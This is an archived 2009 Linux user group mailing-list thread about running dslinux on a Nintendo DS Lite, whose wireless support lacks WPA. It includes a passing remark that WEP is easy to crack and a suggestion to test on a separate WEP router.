The whole concept of "wireless encryption security" is somewhat moot with
airdump-ng etc tools.

WEP keys are really easy to break.

WPA is also easily encroached - but harder with a truely unique secure key
(which few people use)

It just exists as part of the big "security" matrix to keep the honest
people out.  Crackers can get right in anyway!

http://www.obnosis.com/Layer8Wireless.html

-- 
Skype: (623)239-3392
AT&T: (503)754-4452
www.it-clowns.com
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-14 Thread AZ RUNE 
Buy another router and set up a 2nd network with no Internet Access to test
it on WEP.

Brian

On Fri, Nov 13, 2009 at 11:27 PM, Steven A. DuChene <
linux-clust...@mindspring.com> wrote:

> Well, I discovered according to the dslinux docs that the wireless
> support only works with no encryption or WEP. No WPA or WPA2 support is
> planned.
>
> Unfortunately I have my wireless router setup and working with WPA2
>
> Nuts!  I was looking forward to ssh'ing to the the NDS from my
> desktop system. :-)
>
>
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-13 Thread Steven A. DuChene 
Well, I discovered according to the dslinux docs that the wireless
support only works with no encryption or WEP. No WPA or WPA2 support is planned.

Unfortunately I have my wireless router setup and working with WPA2

Nuts!  I was looking forward to ssh'ing to the the NDS from my
desktop system. :-)

-Original Message-
>From: Alan Dayley 
>Sent: Nov 14, 2009 1:08 AM
>To: "Steven A. DuChene" , Main PLUG discussion 
>list 
>Subject: Re: running Linux on odd devices is SOOO COOL!
>
>What fun!  Keep playing and learning.
>
>Alan
>
>On Fri, Nov 13, 2009 at 10:34 PM, Steven A. DuChene
> wrote:
>> So I am running a special version of Linux on my son's Nintendo DS Lite 
>> handheld game console!
>>
>> It is so cool!



---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-13 Thread Alan Dayley 
What fun!  Keep playing and learning.

Alan

On Fri, Nov 13, 2009 at 10:34 PM, Steven A. DuChene
 wrote:
> So I am running a special version of Linux on my son's Nintendo DS Lite 
> handheld game console!
>
> It is so cool!
>
>
> ---
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

Re: running Linux on odd devices is SOOO COOL!

2009-11-13 Thread mike havens 
that is so cool!

On 11/13/09, Steven A. DuChene  wrote:
>
> So I am running a special version of Linux on my son's Nintendo DS Lite
> handheld game console!
>
> It is so cool!
>
>
> ---
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>



-- 
:-)~MIKE~(-:
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss